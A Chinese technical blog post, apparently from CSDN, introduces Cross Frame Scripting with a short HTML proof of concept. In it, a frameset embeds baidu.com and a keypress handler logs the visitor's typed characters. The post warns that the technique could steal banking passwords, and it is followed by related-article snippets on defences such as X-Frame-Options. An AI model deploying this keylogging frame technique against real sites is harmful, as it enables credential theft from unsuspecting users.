Cross Frame Script (跨框架脚本) 攻击

最新推荐文章于 2022-01-27 18:10:38 发布
最新推荐文章于 2022-01-27 18:10:38 发布
阅读量6.8k 收藏
点赞数
分类专栏: 脚本网页语言安全和网站攻防 文章标签: 框架 脚本 scripting html 浏览器 function

什么是Cross Frame Script?

很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。

<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () { 
   k = window.event.keyCode; 
   window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset οnlοad="this.focus();" οnblur="this.focus();" cols="100%">
 <frame src="http://www.baidu.com/" scrolling="auto">
</frameset>
</html>

当你在百度的搜索框输入字符时,你会发现左下角的状态栏上出现了你输入的字符。

Cross Frame Script 原理

利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码中加入scirpt,监视、盗取用户输入。

Cross Frame Script 危害

一个恶意的站点可以通过用框架包含真的网银或在线支付网站,获取用户账号和密码。

更详细的资料参考,http://www.xs4all.nl/~ppk/js/crosfram.html  

iiprogram
关注
专栏目录
.NET框架脚本(XFS)漏洞解决方案
Teemo_2016的博客
07-23 1232
框架脚本(XFS)漏洞使攻击者能够在恶意页面的 HTML iframe 标记内加载易受攻击的应用程序。攻击者可以使用此漏洞设计点击劫持攻击,以实施钓鱼式攻击框架探查攻击、社会工程攻击站点请求伪造攻击。 点击劫持攻击的目的是欺骗受害用户在不了解的目标网站上与攻击者选择的 UI 元素交互,然后反过来代表受害者执行特权功能。为达到这一目的,攻击者必须攻击 XFS 漏洞以在 iframe 标记内...
Cross Frame Script 框架脚本 攻击
qq_43746825的博客
02-22 524
Cross Frame Script 框架脚本 攻击
【常见Web应用安全问题】---6、Script source code disclosure
weixin_34128839的博客
12-22 425
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
Cross Frame Scripting
huzk4409的专栏
08-07 1964
有時白箱工具會掃出Client Cross Frame Scripting Attack , 可以在 Header 中加入設定X-FRAME-OPTIONS 但是這樣有些 白箱工具並不知道, 客戶還是會要你改到 Report 看不到, 那怎麼辦呢? 這時候一般會在js中加入 if (top != self) {top.location = self.location;} ...
XFS: Cross Frame Script (框架脚本) 攻击
weixin_33736048的博客
01-09 1051
一、Cross Frame Script (框架脚本) 攻击什么是Cross Frame Script?很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。&lt;html&gt;&lt;head&gt;&lt;title&gt;IE Cross Frame Scripting Restriction Bypass Example&lt;/title&...
jQuery - 参考资料 - About Cross-Frame Scripting and Security:关于框架脚本和安全
胡争辉
11-06 2125
jQuery - 参考资料 - About Cross-Frame Scripting and Security:关于框架脚本和安全 [About Cross-Frame Scripting and Security: - 文档] http://msdn2.microsoft.com/en-us/library/ms533028.aspx [jQuery -
XFS框架脚本漏洞介绍
发哥微课堂
09-18 1108
※ 介绍※ XFS即Cross-FrameScripting框架脚本,也叫iFrame注入,了解XFS问题前先来看下面这个小例子,有如下一段html代码。 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> <script&g...
JS的33个概念—前端安全(脚本攻击XSS和站请求伪造CSRF)
jiaojsun的博客
07-26 1214
1.脚本攻击(XSS) 1)定义 脚本攻击是基于web应用中已知的漏洞,服务端,或者依赖的插件系统。利用其中一种方式,攻击者可以把恶意内容放进目标站点传输的内容中。当这种结合的内容到达客户端的浏览器中,它就已经变成从受信任的来源传输的,然后在系统授权下进行操作。通过寻找把恶意脚本注入web页面的方法,攻击者可以获取对敏感页面的访问权限,例如对session cookie和浏览器代表用...
Web应用安全:脚本攻击(XSS)的原理与防护
# 1. 引言 ## 1.1 什么是Web应用安全 ...XSS(Cross-Site Scripting攻击是一种常见的Web应用安全漏洞,也是最为危险的攻击之一。当Web应用被XSS攻击成功后,黑客可以插入恶意脚本代码到Web页面中,
Cross-Frame Scripting漏洞解决---当你这个漏洞解决不了时,不妨看一下
better1166的博客
09-15 1807
使用HP webInspect进行漏洞扫描时,总是出现Cross-Frame Scripting这个漏洞,经过一次次的扫描测试,终于发现解决办法: (1)漏洞扫描报告关于设置X-FRAME-OPTIONS的方法,由于自己用的不是正式的webInspect版本,即使不设置这个,后台扫描时也不会出现这个漏洞,个人觉得这个方法并不是针对所有的扫描设备都管用,但是遇到的时候测试一下,说不定就好了呢; (2)在页面初始化时加上 if(top != self) { ...
域 iframe 实例 (Cross-Domain Javascript execution library)
03-31
NULL 博文链接:https://justcoding.iteye.com/blog/1374728
站式脚本(Cross-SiteScripting)XSS攻击原理分析第1/4页
10-30
XSS又叫CSS (Cross Site Script) ,脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
Cross Frame 与不同域进行交互
03-28
NULL 博文链接:https://mllongze.iteye.com/blog/1234987
Cross-Frame Scripting 漏洞解决
CutelittleBo的博客
01-24 1119
设置 nginx 添加以下指令到 http, server 或 location 中 add_header X-Frame-Options SAMEORIGIN; 参考:https://developer.mozilla.org/zh-TW/docs/Web/HTTP/Headers/X-Frame-Options
frame脚本和安全问题
SilentAcorn的专栏
11-13 998
仅作一下翻译,原文: About Cross-Frame Scripting and Security 在DHTML中,不同的窗口和框架(frames)中的内容可以通过对象模式用脚本相互交互。但是,由于可以在一个浏览器中通过多个窗口和框架同时显示多个毫不相干的内容,因此制定一定的限制性规则用于确保数据的真实性和保护个人隐私信息就显得很有必要的。 这片文章描述了为什么要添加这些限制性规则,以及这些规
漏洞修复:Cross-Frame Scripting Medium
CutelittleBo的博客
01-27 1006
描述: A Cross-Frame Scripting (XFS) vulnerability can allow an attacker to load the vulnerable application inside an HTML iframe tag on a malicious page. The attacker could use this weakness to devise a Clickjacking attack to conduct phishing, frame sniffing
JavaScript学习笔记-脚本(Cross-site scripting,CSS,XSS)漏洞
lyzcren的博客
01-04 1416
Cross Site Script,缩写CSS又叫XSS,中文意思脚本攻击,指的是恶意攻击者往Web页面里插入恶意html代码。 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。 维基百科:https://en.wikipe
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值